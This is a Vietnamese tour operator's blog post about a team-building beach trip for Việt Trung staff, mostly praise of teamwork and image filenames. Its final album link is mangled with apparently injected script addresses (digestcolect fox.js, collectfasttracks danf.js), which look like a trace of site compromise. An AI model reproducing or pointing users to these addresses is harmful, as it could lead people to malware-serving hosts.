Tổ chức du lịch Team building: Chinh phục những tầm cao – Việt Trung

Trong chuyến du lịch 3 ngày 2 đêm tại biển Hải Tiến các thành viên của đại gia đình Việt Trung đã có những kỷ niệm vô cùng khó quên. Các thử thách của chương trình Team building mà Vietwind đưa ra giúp cho các chiến binh hiểu nhau và gắn kết hơn.

 to-chuc-team-building-viet-trung-vietwind-team-building-2 to-chuc-team-building-viet-trung-vietwind-team-building-3 to-chuc-team-building-viet-trung-vietwind-team-building-4

Thông qua đó, những trò chơi Team building đã mang lại những bài học vô cùng quý giá và ý nghĩa cho những người chơi. Hơn thế nữa, những thử thách được đưa ra còn giúp sợi dây gắn kết giữa các thành viên thêm bền chặt. 

to-chuc-team-building-viet-trung-vietwind-team-building-6

to-chuc-team-building-viet-trung-vietwind-team-building-1

Sự hợp tác ăn ý và thấu hiểu lẫn nhau là các nhân tố quan trọng để họ hoàn thành được các thử thách và giành chiến thắng. Bởi Sức mạnh của nhóm là từng thành viên. Sức mạnh của mỗi thành viên chính là nhóm. Thông qua các trò chơi, mỗi thành viên lại có cơ hội để phát huy khả năng sáng tạo của bản thân đồng thời phát triển các kỹ năng quan trọng trong cuộc sống như kỹ năng giao tiếp, kỹ năng teamwork và kỹ năng lãnh đạo.

to-chuc-team-building-viet-trung-vietwind-team-building-5

Vietwind – Bứt phá vươn cao!

*Clip Team building – Việt Trung


* Xem thêm album: 

>>> https://css.digestcolect.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&www.facebook.com/vietwindtravel.com.vn/photos/?tab=album&album_id=1001047053336708

Facebook Comments

Bài Viết Liên Quan